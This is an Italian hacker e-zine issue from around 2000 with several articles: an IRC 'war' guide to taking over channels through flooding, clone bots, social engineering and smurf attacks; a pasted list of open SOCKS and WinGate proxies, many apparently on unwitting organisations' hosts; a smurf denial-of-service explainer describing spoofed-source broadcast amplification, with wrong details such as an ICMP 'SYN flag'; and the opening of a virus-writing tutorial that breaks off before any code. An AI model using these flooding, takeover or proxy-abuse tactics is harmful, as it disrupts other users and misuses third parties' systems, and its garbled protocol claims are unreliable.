-=!!!|-SMS gRatiS c0n 0mNitEl? -[upDaTe]-|!!!=-

Autore: 0lDir0n61

Questo articolo e' per avvertirvi del fatto che il metodo spiegato da me nel
numero precedente dell' e-zine (4Y prima del msg.) non serve per mandare msg
a scrocco, ma semplicemente per avere la notifica dell'arrivo del messaggio!
Un grazie a chi ha segnalato questo mio errore: sp3nky & Cavallo de Cavallis

Ciao a tutti ed alla prossima!!!

---0lDir0n61---


-=!!!|-kazZate kE gIrAn0 sUlLa rEte-|!!!=-

Autore: Sp3nkY

sAlve raga.....ho notato ke un boato di gente manda un sakko di sMs con il
proprio c3llo[...lare]e tenta di mandarli gratis[e] mettendo o
yyyy<spazio>messaggio
oppure yyyyciao<spazio>messaggio
[questo solo da omnitel a omnitel,almeno mi pare,xke' da omnitel a wind non
funzia],il risultato e' ke vi arrivera' una scritta simile
[xke' non me la rikordo]:

##STATUS## Delivered. sent at 0###-####### <la data> <l'ora>.

(<ndr> il messaggio che si riceve e':
" <STATUS>
Delivered. Message sent at:
03xx-xxxxxxx (Data e ora)
(*sc:0)"
)

Quindi il servizio serve solo per sapere quando arriva l'sMs sul cellulare
destinatario.
C'e' anke ki cambia [sui cellulari a contratto TIM] il centro degli sms
mettendoci quello della Netcom ke non funzia oppure cancellano il messaggio
dell'addebbito e spengono il cellulare.
se n0n l'avete ankora capito tutti sti metodi del cazzo tipo leggende
metropolitane ve fanno pagà lo stesso gli sms.
sE penSate di rikarikarvi le vostre skede omnitel e tim kon quei programmi
[kazzo,come se kiamano?] ke vengono spacciati per generatori de kodici vi
conviene stakkarvi da soli le k0rNe3 prima ke lo faccia il vostro monitor.
Quello della TIM lo dovrebbero aver fatto sotto l'effetto di peyote
[=la meskalina],invece quello della omnitel genera numeri + kredibili ma ke
almeno a me non funziano.
p0rka l'oka quanto sto skazzato,Lella perke' non mi kiami?
[skusate ma lo dovevo dire.....]
ekko tutto quello ke avevo da dire.....non sono neanke un wannabe decente
[ke ce volete fa?]
un saluto a tutti in particolare a tutto #aprilia #futurezone e #italia^ ,
a merce[D],^-Hiolz-^,francy15 (bau!!)e a ritacc[quella ke il fato non ha
fatto mia mamma..smack]

---sP3nKy---



###############################
####### III RRRR CCCC #######
####### III R R C #######
####### III RRRR C #######
####### III R R C #######
####### III R RR CCCC #######
###############################

-=!!!|-IrC_WaR tUt0rIal-|!!!=-

Autore: LoRD`xYz

L'irc-war non e' altro che le guerre virtuali che si fanno in rete fra le crew
soprattutto in IRCNET; dunque il tutto sta' nel far cadere persone o bot per
prendere il possesso di un canale, adesso spieghero' bene e in modo semplice
come fare. prendiamo un canale dove non sono presenti bot facilissimo fare
take ci sono svariati modi, ne spieghiamo alcuni:

1) take con op
2) take senza op

1) take con op e' il piu' facile se avete l' op basta deoppare tutti e il
gioco e' fatto! Basta entrare con un nick da donna entrare in query con un
maschio fare la puttana e lui crollera' ai vostri piedi poi fate la fatidica
domanda :" come si diventa operatori, mi fai vedere ??"
Dopo che avrete l'op il piu' difficile e' fatto; nel frattempo dovrete aver
gia' caricato 10 cloni d'assalto anche senza socks intanto non ci sono bot che
riconoscono i cloni li oppate veloci e fate il comando max deop e il gioco e'
fatto senza aver fatto fatica a questo punto mettere il canale +ismtn e
kikkate tutti

2) take senza bot e' un po' piu' difficile ma non tanto dovrete avere i vostri
fidati cloni d' assalto , ma per maggior sicurezza metteteli su socks tutti e
10 o almeno 5 cosi' dovranno fare + fatica a bannarli quando entrerete a fare
del gran flood ma prima sempre con i vostri cloni teneteli in canale vostro e
incominciate a fare del gran ping flood poche persone hanno attivo la
protezione da ping e le vedrete cadere come merde in excess flood poi a questo
punto fate un bel part/join in canale o un notice flood per finire quando
saranno tutti deop poi continuate finche' non cadranno tutti a questo punto
alla velocita' della luce fate uscire i bot e entrate veloci nel canale poi
settate il canale come indicato nel punto 1

Adesso vi spieghero' il modo per fregare i bot che a volte sono piu' stupidi
degli esseri umani se settati male o messi su shell di merda.
Il primo punto che vi ho spiegato puo' andare ben anche con bot basta che i
cloni siamo tutti su socks con l' op si fa tutto. Ma se non lo avete tentare
un attacco diretto non servirebbe a un cazzo solo a farvi ridere dietro o
avete molti amici con 10 cloni allora la storia cambia; io vi sto spiegando a
fare take con le vostre forze da soli.

Anche qua ci sono due modi:
1) con uno split
2) con lo smurf

1) con uno split (parto dal pressupposto che sappiate cos'e' uno split) se non
lo sapete fra poco uscira' il mio memorandum proprio per chi non sa nulla di
internet e roda varia (pubblicita' occulta:))))))))) ).
Non crediate che siano sempre i bot i piu' veloci a connettersi dopo uno split
ci sono dei socks che sono piu' veloci delle shell ci sono state molte volte
che sono riuscito a fregate i bot ihhihihihihi
dunque basta tenere un clone pronto su socks che vada e lo farete connettere
quando arriva lo split molte volte il server vi mettera' come op dopo bastera'
mettere i cloni sul un server linkato non splittato e quando si server si
rilinkano il vostro clonino oppera' gli altri e i bot si faranno fottere ,
molto bello vedere il proprietario dei bot che smadonna su come un povero
scemo con solo un socks abbiamo potete fregare i suoi bot che gli costano ogni
mese dei soldi ;)))))))

2) con lo smurf : dovrete avere linux, una shell e un buon bnc e lo smurf e'
un programma,lo troverete in qualsiasi motore di ricerca, basta solo
compilarlo e il gioco e fatto adesso mettete l' ip del bot e il povero bot
verra' bombardato da milioni di ping e dopo un po' cadra' inesorabilmente con
un bel ping time out. Fra un po' lo smurf sarà morto visto che fra un po' i
server controlleranno il contenuto di ogni pacchetto e quindi lo rimanderanno
al mittente con tanti saluti sarai autosmurfato, ma ricordate sempre fatta la
legge trovato l' inganno non passera' molto tempo e saranno fregati anche quei
server con il controllo ; e'come quando uscirono i log dicevano che era
impossibile hackerare ehhhhhhhhhhhhhhhhhhh proprio impossibile:)))))))))))

P.S : io sono fermamente contro le cose che ho indicato sopra per me sono
comportamenti da lamer che non vanno fatti rompere le palle alla gente che
chatta in compagnia con take nuke e lamerate varie, non so se leggerete quanto
io sto scrivendo adesso o sarete li a caricare cloni in questo momento , ma vi
vorrei dire pensate prima a quello che state facendo ; io non sono nessuno per
impedirlo , lo ho fatto anche io quando a 16 anni ma adesso ho smesso e' un
periodo in cui dovrete pensare se rimanere lamer o fare qualcosa d' altro.
Adesso vi saluto adios A/\/ARCHY RULEZZZZZZzzzzzzzzzZZZZZZZZZ!!!!!!!!!!!!

---LoRD`xYz---

-=!!!|-lIsTa s0cKs & wInGaTeS-|!!!=-

Autore: SONOunuomo

<lamentele>
La scuola mi assedia i pirla mi assediano lo stress mi assedia
non ho voglia di studiare non pero' e' fine anno e quindi DEVO farlo
faccio sto articolo perche' ho le palle che mi girano e ho voglia di scrivere
stronzate ... c'e' un mio compagno di classe che dice che windows e meglio di
linux e ne e' pienamente convinto e lo voglio picchiare!!!
</lamentele>

Dubbio del giorno : Io Sono un lamer si o no ??? sono un wannabe si o no ???
sono un newbies si o no ???

sicurezza del giorno : io non sono un hacker !!

Questo articolo non e' altro che uno spudorato copia-incolla di un po di
indirizzi socks e wingate trovati nella rete. Pero' sono sicuro che vi sara'
piu' utile di tutti quegli articoli di 100000 pagine che vi spiegano cos'e'
un proxy o un wingate e non ve ne danno alcuno e ne' vi dicono dove trovarli


LISTA AGGIORNATA AL 5-04-2000


SOCKS 4 (Port 1080)


HOSTNAME IP ADDRESS
NotFound,12.2.81.50,
NotFound,194.243.99.199,
NotFound,194.243.99.162,
NotFound,194.204.206.160,
NotFound,194.204.204.137,
NotFound,194.186.180.100,
NotFound,194.149.137.11,
mail.ermanco.com,12.2.82.130,
NotFound,195.14.162.221,
NotFound,195.14.162.220,
proxy.indussoft.com,12.26.8.18,
theleu.lnk.telstra.net,139.130.74.160,
noeljo9.lnk.telstra.net,139.130.54.153,
altona.lnk.telstra.net,139.130.80.123,
patter.lnk.telstra.net,139.130.81.160,
mccabe.lnk.telstra.net,139.130.59.187,
edtn002050.hs.telusplanet.net,161.184.144.18,
NotFound,195.5.59.227,
igic.bas-net.by,194.85.255.49,
NotFound,195.178.196.250,
NotFound,195.178.196.251,
jovellanos.com,194.224.183.221,
NotFound,195.42.150.132,
NotFound,200.36.19.225,
rnpbn.microdata.ro,195.179.246.130,
ns.ukrnafta.ukrtel.net,195.5.22.193,
server3.italcontainer.it,195.135.39.189,
news.ukrnafta.ukrtel.net,195.5.22.196,
comm.atv.volga.ru,195.144.196.129,
www.ukrnafta.ukrtel.net,195.5.22.195,
mail.theova.com,195.14.148.65,
p107.nas2.is3.u-net.net,195.102.196.235,
NotFound,203.21.16.182,
limedika.balt.net,195.14.161.169,
NotFound,203.116.5.58,
C824154A.podernet.com.mx,200.36.21.74,
internet-server.ebf.com.br,200.231.27.1,
t2s187.data.net.mx,200.13.19.196,
dns-server1.tj.pa.gov.br,200.242.244.1,
cas.cecosami.com.pe,200.37.242.3,
pcse.essalud.sld.pe,200.37.132.130,
m105.clic-in.com.br,200.231.28.15,
ad202.166.34.39.magix.com.sg,202.166.34.39,
c111.h202052116.is.net.tw,202.52.116.111,
nor24788-1.gw.connect.com.au,202.21.13.46,
ad202.166.33.67.magix.com.sg,202.166.33.67,
sripenanti01-kmr.tm.net.my,202.188.62.6,
ad202.166.38.229.magix.com.sg,202.166.38.229,
BlackBox01.irg.com.au,203.21.16.201,
NotFound,206.103.12.131,
secure.hnlfleet.com.au,203.21.16.177,
relectronic.ozemail.com.au,203.108.38.61,
cipher.ruksun.com,204.94.124.135,
tconl9076.tconl.com,204.26.90.76,
52-012.al.cgocable.ca,205.237.52.12,
52-061.al.cgocable.ca,205.237.52.61,
NotFound,206.112.35.146,
jnet.vip.best.com,206.184.160.227,
NotFound,207.0.119.67,
NotFound,209.166.180.19,
dsl-148-146.tstonramp.com,206.55.148.146,
proxy.imojo.net,206.112.35.222,
mail.clintrak.com,206.112.35.178,
NotFound,210.237.181.226,
proxy1.israeloff.com,206.112.35.156,
sai0103.erols.com,207.96.118.243,
ch-angrignon.qc.ca,207.236.200.66,
207-246-74-54.xdsl.qx.net,207.246.74.54,
ae2.lightlink.com,207.127.235.190,
122-94.w3.com.uy,207.3.122.94,
admin.chestnut.org,208.16.57.40,
brsh4.carol.net,208.128.229.100,
brsh2.carol.net,208.128.229.98,
adsl-209-182-168-236.value.net,209.182.168.236,
ip48.gte5.rb1.bel.nwlink.com,209.20.218.48,
NotFound,210.56.18.228,
smtp.netcarrier.net,209.140.172.6,
martinselig.com,209.20.156.130,
billymchales.com,209.20.195.10,
ns.ticketport.co.jp,210.160.142.82,
ipshome-gw.iwahashi.co.jp,210.164.242.146,
wingate.shokoren.or.jp,210.145.221.99,
ns.isd-japan.co.jp,210.161.71.114,
NotFound,212.205.26.80,
NotFound,212.47.11.130,
ns.wings.co.jp,210.168.241.106,
NotFound,212.22.69.35,
NotFound,212.68.162.183,
jp-gw.jprint.co.jp,210.164.234.2,
sanpx1.san.town.sonobe.kyoto.jp,210.160.246.9,
dns.rikcad.co.jp,210.170.89.210,
dns.hokuto.ed.jp,210.233.0.34,
NotFound,212.68.162.177,
dns1.ctsjp.co.jp,210.172.87.146,
NotFound,216.72.45.152,
ftp.eclectica.net,212.210.32.228,
ns.terna.ru,212.188.26.67,
mail.trutnov.cz,212.27.207.8,
ftp.sdi.kiev.ua,212.68.162.17,
zskom.vol.cz,212.27.207.7,
www.chania-cci.gr,212.205.27.194,
www.sos.iqnet.cz,212.71.157.102,
cr216724718.cable.net.co,216.72.47.18,
216-59-38-142.usa.flashcom.net,216.59.38.142,
symbolics.org,216.103.122.180,
216-59-40-72.usa.flashcom.net,216.59.40.72,
mail.savvyuser.net,216.103.122.178,
cr216724724.cable.net.co,216.72.47.24,
www.cassvillesd.k12.wi.us,216.56.42.3,
www.dyvic.com,24.92.249.251,
164-100.tr.cgocable.ca,24.226.164.100,
nic-c40-143.mw.mediaone.net,24.131.40.143,
nic-c46-209.mw.mediaone.net,24.131.46.209,
modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161,
modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118,
x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44,
nic-c42-068.mw.mediaone.net,24.131.42.68,
adsl-63-196-81-8.dsl.sndg02.pacbell.net,63.196.81.8,


SOCKS 5 (Port 1080)


NotFound,168.187.78.34,
NotFound,194.243.99.162,
NotFound,194.243.99.199,
chester.chesterschooldistrict.com,12.6.236.250,
NotFound,194.186.180.100,
NotFound,194.226.183.34,
NotFound,200.37.242.4,
NotFound,200.241.64.130,
NotFound,200.37.242.5,
mccabe.lnk.telstra.net,139.130.59.187,
router.kbs.com.kw,168.187.79.97,
OfficeCOM-EUnet.AT.EU.net,193.80.63.42,
jovellanos.com,194.224.183.221,
igic.bas-net.by,194.85.255.49,
gaon.zg.szczecin.pl,195.116.25.98,
md.cl.balt.net,195.14.162.221,
ibp.santa.krs.ru,195.161.57.133,
www.zyvs.lviv.net,195.5.34.99,
mail.medikona.lt,195.14.162.220,
petrozavodsk.karelia.ru,195.161.9.226,
C824154A.podernet.com.mx,200.36.21.74,
internet-server.ebf.com.br,200.231.27.1,
cas.cecosami.com.pe,200.37.242.3,
NotFound,206.103.12.131,
m105.clic-in.com.br,200.231.28.15,
ad202.166.33.67.magix.com.sg,202.166.33.67,
NotFound,206.112.35.146,
c111.h202052116.is.net.tw,202.52.116.111,
ad202.166.34.39.magix.com.sg,202.166.34.39,
nor24788-1.gw.connect.com.au,202.21.13.46,
relectronic.ozemail.com.au,203.108.38.61,
mail.clintrak.com,206.112.35.178,
proxy1.israeloff.com,206.112.35.156,
NotFound,210.154.48.188,
NotFound,210.56.18.228,
port58151.btl.net,206.153.58.151,
207-246-74-54.xdsl.qx.net,207.246.74.54,
adsl-209-182-168-236.value.net,209.182.168.236,
billymchales.com,209.20.195.10,
www.onlyoneht.co.jp,210.170.93.66,
ns.isd-japan.co.jp,210.161.71.114,
ns.wings.co.jp,210.168.241.106,
dns1.ctsjp.co.jp,210.172.87.146,
dns.rikcad.co.jp,210.170.89.210,
dns.hokuto.ed.jp,210.233.0.34,
ftp.sdi.kiev.ua,212.68.162.17,
morris.ocs.k12.al.us,216.77.56.74,
jeter.ocs.k12.al.us,216.77.56.98,
wforest.ocs.k12.al.us,216.77.56.82,
cr216724718.cable.net.co,216.72.47.18,
carver.ocs.k12.al.us,216.77.56.114,
oms.ocs.k12.al.us,216.77.56.106,
ohs.ocs.k12.al.us,216.77.56.122,
south.ocs.k12.al.us,216.77.56.90,
north.ocs.k12.al.us,216.77.56.66,
165-246.tr.cgocable.ca,24.226.165.246,
WINGATES
NotFound,194.243.99.162,
NotFound,195.112.199.130,
NotFound,210.161.200.82,
NotFound,194.204.208.86,
NotFound,206.103.12.131,
NotFound,210.56.18.228,
52-061.al.cgocable.ca,205.237.52.61,
adsl-209-182-168-236.value.net,209.182.168.236,
fsv.elnet.lt,193.219.6.254,
dns.hokuto.ed.jp,210.233.0.34,
dns1.ctsjp.co.jp,210.172.87.146,
ad202.166.33.67.magix.com.sg,202.166.33.67,
adsl-209-182-168-188.value.net,209.182.168.188,
ad202.166.34.39.magix.com.sg,202.166.34.39,
cr216724718.cable.net.co,216.72.47.18,
billymchales.com,209.20.195.10,
router.kbs.com.kw,168.187.79.97,
burnem.lnk.telstra.net,139.130.54.178,
mccabe.lnk.telstra.net,139.130.59.187,
altona.lnk.telstra.net,139.130.80.123,
dns.rikcad.co.jp,210.170.89.210,
207-246-74-54.xdsl.qx.net,207.246.74.54,
edtn002050.hs.telusplanet.net,161.184.144.18,
port58151.btl.net,206.153.58.151,
rnpbn.microdata.ro,195.179.246.130,
wingate.shokoren.or.jp,210.145.221.99,
165-246.tr.cgocable.ca,24.226.165.246,
fao.cs.msu.su,158.250.10.200,
slava.krascience.rssi.ru,193.232.19.90,



WINGATES


NotFound,194.243.99.162,
NotFound,195.112.199.130,
NotFound,210.161.200.82,
NotFound,194.204.208.86,
NotFound,206.103.12.131,
NotFound,210.56.18.228,
52-061.al.cgocable.ca,205.237.52.61,
adsl-209-182-168-236.value.net,209.182.168.236,
fsv.elnet.lt,193.219.6.254,
dns.hokuto.ed.jp,210.233.0.34,
dns1.ctsjp.co.jp,210.172.87.146,
ad202.166.33.67.magix.com.sg,202.166.33.67,
adsl-209-182-168-188.value.net,209.182.168.188,
ad202.166.34.39.magix.com.sg,202.166.34.39,
cr216724718.cable.net.co,216.72.47.18,
billymchales.com,209.20.195.10,
router.kbs.com.kw,168.187.79.97,
burnem.lnk.telstra.net,139.130.54.178,
mccabe.lnk.telstra.net,139.130.59.187,
altona.lnk.telstra.net,139.130.80.123,
dns.rikcad.co.jp,210.170.89.210,
207-246-74-54.xdsl.qx.net,207.246.74.54,
edtn002050.hs.telusplanet.net,161.184.144.18,
port58151.btl.net,206.153.58.151,
rnpbn.microdata.ro,195.179.246.130,
wingate.shokoren.or.jp,210.145.221.99,
165-246.tr.cgocable.ca,24.226.165.246,
fao.cs.msu.su,158.250.10.200,
slava.krascience.rssi.ru,193.232.19.90,

---SONOunuomo---


-=!!!|-dAi, sMurFiaM0 iNsIemE!!-|!!!=-

Autore: ValK
____________________________________
| DAI |
| SMURFIAMO |
| INSIEME |
| Writter: ValK King Of The Net |
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
____________________________
----< Introduzione >----
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Sara' capitato sicuramente anche a voi
di essere smurfato! bello vero, con i
lag che vanno dai 6 minuti (ndr. x me con
una isdn 128) a 30 - 35 nimuti,
e' una senzazione stupenda quasi magica
tutte le spie del modem accese i "tele-
visorini"
della connessione che diventano
verdi fosforescenti.
Cmq lo smurf non e' tutta questa grand
sofistichezza (ndr. non so' se esiste
sto termine ma e' uguale) infatti e' solo
un sistema di sfruttare un bug delle grandi
reti con tecnici molto stupidi!

____________________________
----< Ma Come Funziona? >----
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Se c'e' un DoS semplice questo e' lo
smurf. Infatti esso e' una semplice
risposta a un pacchetto icmp con il FLAG
SYN attivo, questo flag obbliga il server
a rispondere al pacchetto con un'altro
pacchetto.
Lo smurf sfrutta questo fatto per
portare un attacco devastante al vostro
modem facendo morire vostra connessione.
Lo smurf si basa sulla porta broadcast dei
server (x.x.x.0 oppure x.x.x.255) con
server che hanno al loro seguito
molti, molti pc, e a questa porta broadcast
non controllata, viene inviato
un pacchetto icmp con FLAG SYN. Il server
risponde, il bello e' che non risponde
solo lui, infatti inviando il pacchetto
al server lo si invia anche a gli altri
pc a cui e' collegato!
Badate xo' non e' che tutti i server ab-
biano la porta broadcast acessibile
altrimenti sarebbe uno smurfa smurfa
generale, non e' che se mandate un
icmp SYN a tin.it vi rispondono 30.000 pc
di tutta italia, ma avete una buona pos-
sibilita' che il server risponda come sperato
se si trova in Cina o oppure in Russia,
insomma dove il pc piu' potente e' il C64!
Ma uno smurf fatto da un solo server
non farebbe nulla anche xche' le broadcast
con molti pc al seguito sono poche; allora
si avra' bisogno di una lista "BroadCast"
Ma prima di vedere i dettagli sullo smurf
vediamo il protocollo TCP/IP molto, motlo
schematizzato:
_____________________________________
| INTESTAZIONE IP |
| ___________ _______________ |
| |IP SORGENTE|-----|IP DESTINAZIONE| |
| ¯¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ |
| INTESTAZIOEN ICMP |
| ___________ _______________ |
| | TIPO |-----| CODICE | |
| ¯¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ |
| DATI ICMP |
| |
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

____________________________
----< VOGLIO I DETTAGLI! >----
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

il programma x lo smurf crea un pacchet-
to icmp contraffatto.
Voi direte e xche'?
Se avete seguito quanto detto su' potete
immaginarlo. Voi siete masochisti? Vi
fareste del male? Beh allora penso che
non manderete mai un icmp SYN a un server con
la porta broadcast accessibile!
E allora se volete fare danno a qualcuno?
Mandate un Pacchetto icmp SYN a questi server
che abbiano come ip sorgente quello della vit-
tima!
Ed e' a questo che serve il programma smurf.
Lui crea un Pacchetto ICMP SYN che nell'inte-
stazione IP (vedi schema sopra) e al posto del
ip sorgente vostro ci mette quello della vittima
e come destinazione quella della broadcast!
Semplice no?

____________________________
----< L'ESEMPIO >----
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
<vittima: 126.1.1.1>

|***********************|
|---> brodcast list <---|
| x.x.x.x |
| y.y.y.y |
| z.z.z.z |
| h.h.h.h |
|---> fine brodcast <---|
|***********************|
PROGRAMMA: "SMURF"

Smurf -----> ICMP: "126.1.1.1" -- "x.x.x.x"
Smurf -----> ICMP: "126.1.1.1" -- "y.y.y.y"
Smurf -----> ICMP: "126.1.1.1" -- "z.z.z.z"
Smurf -----> ICMP: "126.1.1.1" -- "h.h.h.h"

E la vittima e' bella che distrutta!


____________________________
----< COME MI DIFENDO? >----
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Bhe se ti accorgi in tempo di essere
smurfato ti consiglio di spengere il mo-
dem prima che frigga!
Non c'e' altra difesa.
Tu dirai e il FIREWALL? Il firewall
muore all'inizio dello smurf non arriva
neanche a meta'!
La cosa e' differeante se sei amministra-
tore, infatti ci sono delle patch e delle
informazioni x quanto riguarda la preven-
zione del fenomeno.
Con questo chiudo!

Byezzz

http://members.xoom.it/ValK/
valk@mail.xoom.it

---ValK The King Of The Net---

-=!!!|-gUidA iRc-|!!!=-

Autore: Killvearn



Irc (internet relay chat) Š sinonimo di un luogo immaginario in cui parlare
(appunto chattare) con altre persone di qualsiasi luogo sempre al costo di
una telefonata al vostro provider, ma torniamo indietro a parlare de VERO
funzionamento degli irc servers.

=] Irc servers [= (se non vi interessa andate pure oltre).

Un irc server non Š un monumento ai caduti (come sono sicuro che pensavate :-)
ma un "normalissimo" computer. PerchŠ normalissimo l'ho messo tra virgolette?

Vorrei saperlo anch'io :) . In realt… un motivo c'Š: mentre un normale pc
(come quello della maggior parte di voi) con un modem a 56kbits. oppure una
ricca adsl (600kbits al sec.) pu• gestire un traffico limitato questi super
computer hanno delle linee che tutti noi ci sogniamo capaci di gestire un
traffico enorme, questi pc sono chiamati server (si nota l'invidia?). Essi
sono collegati (linkati) a molte persone ed a vari servers. I servers irc
accettano connessioni solo a determinate porte, alcune di esse sono standard
(6667) cioŠ usate dalla maggioranza (se non dalla totalit…) dei servers,
mentre altre possono essere a discrezione del server (6666, 6665, 6668, ecc.
Ma nessuno vieta che possano essere: 12345, 4555, 5000, ecc.)

Una persona per collegarsi ad un server irc deve disporre di un client irc.
Se ne possono trovare alcuni in giro ma il pi— comune Š mIRC.

=] mIRC [=

mIRC Š un client irc che, come abbiamo gi… detto, vi permette di
connettervi ad un server irc. Esso pu• essere scaricato da: www.mirc.co.uk.

Appena abbiamo il nostro mIRC lo apriamo e notiamo che ci appare qualche
informazione sull'autore e su come registrarlo, questa finestra ci apparir…
ad ogni apertura del programma, a meno che non leviamo il segno di spunta
(la selezione, tanto per capirci) dal quadrato all'angolo in basso a sinistra.

Chiusa questa finestra ce ne appare un'altra con alcune scritte, esaminiamole
al dettaglio:

Nel primo riquadro in alto va inserito il nome del server al quale connettersi.
E' possibile scegliere da una lista oppure inserirne un altro cliccando su
add (apparir… una finestra in cui inserire i dati relativi al server).
Ricordate che su ogniuno dei servers della lista comprende gente diversa a
meno che non scegliate diversi servers linkati tra loro.

Nel secondo riquadro (full name) invece va inserito il vostro nome
(se siete un p• intelligenti non ci mettete quello vero).

Nel terzo (e-mail) invece va messa la vostra e-mail (stesso discorso di prima).

Nel quarto riquadro (nickname) dovrete specificare un vostro nome d'arte che
sar… quello che la gente vedr… nei canali.

Nel quarto ed ultimo riquadro (alternative) va messo un nickname di riserva,
cioŠ il nick che vi verr… assegnato in caso il primo fosse gi… in uso.

Ora premete ok e si chiuder… questa finestra lasciandovi davanti ad una
finestrella con la scritta status ed una barra sotto in cui Š possibile
scrivere.

Li dovete andare a scrivere /identd on <nome che pi— vi piace> naturalmente
senza le <>. Sar… grazie a questo nome che il server vi riconoscŠra.
Infine premete il fulmine in alto a sinistra e verrete connessi al server.
Dopo essere stati connessi al server vi apparir… una finstrella con uno spazio
in cui scrivere. L mettete il canale che volete e premete su join. in futuro
se vorrete entrare in un altro canale vi baster… digitare nello spazio dello
status (ma anche di qualsiasi finestra, solo che se sbagliate a scrivere
potreste rivelare qualcosa di personale, tipo password ecc. alla gente)

/join #nomecanale.

=] Cos'Š un canale? [=

Un canale pu• essere considerato come una stanza in cui un gruppo di persone
pu• riunirsi e parlare. Se non esistessero vi immaginate come ci starebbero
insieme 20000 persone a parlare in pubblico tutte insieme?

=] Comandi fondametali del mIRC [= (da scrivere nei famosi riquadri)

/join #nomecanale entra in un canale

/query <nick> chiama in privato la persona desiderata. Si
pu• ottenere questo effetto anche con un
doppio click sul nick di una persona nel
canale.

/whois <nick> vede tutte le informazioni del nick.

/part #nomecanale esce dal canale.

/quit si disconnette dal server.

/server <nomeserver> si connette al server.


Dopo aver parlato dei comandi pi— comuni possiamo aprire una finestra sugli
operatori di irc.

Infatti Irc non Š un luogo dove la gente che si riunisce ha gli stessi poteri,
ma ci sono delle persone che hanno un potere superiore.

Per fare una gerarchia dei poteri bisogna innanzitutto distinguere i server in
server che offrono servizi di registrazione dei canali e server che non li
offrono. Esaminiamo i due tipi di server in particolare.

=] Server che offrono il servizio di registrazione dei canali. [=

Questi server danno la possibilit… di registrare i canali attraverso alcuni
comandi. In questi server la gerarchia Š questa:

-IrcOp
-Founder di un canale
-SOp (super op)
-AOp (auto op)
-User normale

Ircop: Questa persona ha il potere su tutti i canali. I suoi poteri
sono molto estesi, p—o opparsi da solo su di un canale,
oppure kikkare o bannare dal server qualcuno, ecc.
Generalmente queste persone non offrono quasi mai un
aiuto e quindi se avete qualche problema Š pi— utile
chiedere a qualche persona che abbia una buona competenza in materia.

Founder di un canale: Il founder di un canale rappresenta il suo
proprietario. Egli ha il potere totale
sul canale: pu• dare l'op, l'aop, il sop e
pu• modificare le impostazioni del canale.

Sop: Il sop (super op) Š la persona pi— potente su un canale
dopo il founder. Le sue capacit… sono: aoppare e oppare.
Anche il sop pu• modificare alcune impostazioni, ma solo
il founder ha la piena padronanza di tutte le impostazioni.

Aop: L'aop (auto op) Š un utente che viene oppato in un canale ogni volta
che vi entra. I suoi poteri non superano quelli dell'op.

Op: Pu• oppare, deoppare, kikkare e bannare. Quando esce e
rientra nel canale perde tutti i suoi poteri.


=] Server che non offrono il servizio di registrazione dei canali. [=

In questi server non Š possibile registrare i canali e perci• Š possibile
perdere facilmente il possesso dei canali.

Per ovviare a questo problema molte persone hanno deciso di farsi il proprio
bot personale. Un bot Š uno script residente su una shell. Pi— semplicemente
Š un programma inserito in un server (che sta connesso perennemente)
che simula la connessione di un utente.

Questi bot (abbreviazione di robot) accettano determinati comandi e una volta
ottenuto l'op su un canale, non scollegandosi mai, possono oppare chi Š
provvisto di una password settata dal proprietario.
In questi server la gerarchia Š composta solamente da ircop ed op.

---Killvearn---



#######################################
####### V V III RRRR III III #######
####### V V III R R III III #######
####### V V III RRRR III III #######
####### V V III R R III III #######
####### V III R RR III III #######
#######################################


-=!!!|-ViRuS dEi CoMpUtEr-|!!!=-

Autore: 0-Zone

Discaimer:

Non mi assumo alcuna responsabilita' per quanto riguarda il contenuto del
seguente file. Gli esempi riportati e le spiegazioni sono esclusivamente per
fini didattici. Nessuan responsabilita' potra' essere attribuita all'autore
per l'uso impoprio che altri potranno fare del seguente e delle informazioni
in esso contenute. Non mi assumo alcuna responsabilita' per eventuali danni
causati da uso proprio o improprio del seguente e delle informazioni in esso
contenute. Diffido chiunque dal compilare e/o eseguire i sorgenti contenuti
in questo testo. Essi sono puramente per scopi didattici. L'autore, in breve,
non si assume alcuna responsabilita'.

Contenuti:

1) Cos'e' un virus informatico ?
2) Proprieta' comuni
3) Classi dei virus
3.1) Virus Binari
3.1.1) Companion
3.1.2) Overwrite
3.1.3) Filling
3.1.4) Append
3.1.5) Boot
3.2) Virus Non Binari
3.2.1) Hoax
3.2.2) Macro
3.2.3) Exploit
4) Caratteristiche interessanti
4.1) Stealth
4.2) Encription
4.3) Polimorfico
4.4) Anti A.V.
5) Legislazione italiana in materia
6) Dopo la teoria...la pratica !

(0) Conoscenze necessarie per la comprensione del testo

Per meglio comprendere il testo e' necessaria una conoscenza basilare
dell'Assembly e di come funziona la gestione della memoria (segmenti,
offset). Sarebbe meglio conoscere gia' qualcosa dela programmazione sotto
MS-DOS visto che i programmi virus sono a *stretto contatto* con il
sistema operativo. Consiglio la lettura e la consultazione delle Ralph
Brown Interrupt List reperibili, tra l'altro, su Internet. Un manuale di
Assembly 8086 sarebbe l'ideale ;) durante la lettura del codice.

(1) Cos'e' un virus informatico

Analogamente ai virus biologici, un virus informatico e' un programma (un
programma !) che replica se stesso. Detto cosi' pero' non e' molto chiaro.
Sui libri specifici troverete le definizioni di virus che via via sono
nate che pero', coem tutte le definizioni, sono molto difficili da capire.
Facciamo un esempio per analogia: un virus biologico e' un "essere" che
attacca una cellula. Si replica DENTRO la cellula e manda il suo clone ad
attaccare un'altra cellula. Adesso pensiamo alle cellule come ai nostri
file eseguibili (non solo, poi vedremo perche') e al virus come ad un
